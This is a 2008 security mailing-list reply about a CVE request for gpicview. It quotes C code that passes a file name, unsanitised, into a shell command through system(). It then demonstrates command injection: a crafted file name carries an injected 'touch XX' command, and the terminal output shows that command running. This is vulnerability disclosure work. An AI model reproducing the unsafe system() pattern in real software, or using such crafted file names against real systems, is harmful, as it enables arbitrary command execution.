Re: CVE Request (gpicview)

[Robert Buchholz <rbu () gentoo org>]

On Sunday 31 August 2008, Nico Golde wrote:
> Same piece of code main-win.c doesn't look too trustworthy
> to me either:
>
>     690     int error = jpegtran (filename, "/tmp/rot.jpg" , code);
>     691     if(error)
>     692         return error;
>     693
>     694     //now copy /tmp/rot.jpg back to the original file
>     695     char command[strlen(filename)+50]; //this should not
> generate buffer owerflow 696     // MS: didn't know, how to make it
> better, maybe an own copy routine 697     sprintf(command,"cp
> /tmp/rot.jpg \"%s\"",filename); 698     system(command);
>
> Anyone played with crafted file names?

Good catch! You need to append '.jpg' at the end of the crafed filename 
so the rotation via jpegtran is invoked, but besides that it works ok:

rbu@peanut ~/devel/gentoo/security/gpicview $ ls -l
total 484K
-rw-------  1 rbu rbu 469K 2008-09-03 01:35 bla.jpg"; touch XX ;".jpg

rbu@peanut ~/devel/gentoo/security/gpicview $ gpicview *
QSettings: failed to open file '/usr/qt/3/etc/settings/qt_plugins_3.3rc'
sh: .jpg: command not found
^C

rbu@peanut ~/devel/gentoo/security/gpicview $ ls -l
total 960K
-rw-------  1 rbu rbu 469K 2008-09-03 01:52 bla.jpg
-rw-------  1 rbu rbu 469K 2008-09-03 01:35 bla.jpg"; touch XX ;".jpg
-rw-------  1 rbu rbu    0 2008-09-03 01:52 XX


Robert

Attachment: signature.asc
Description: This is a digitally signed message part.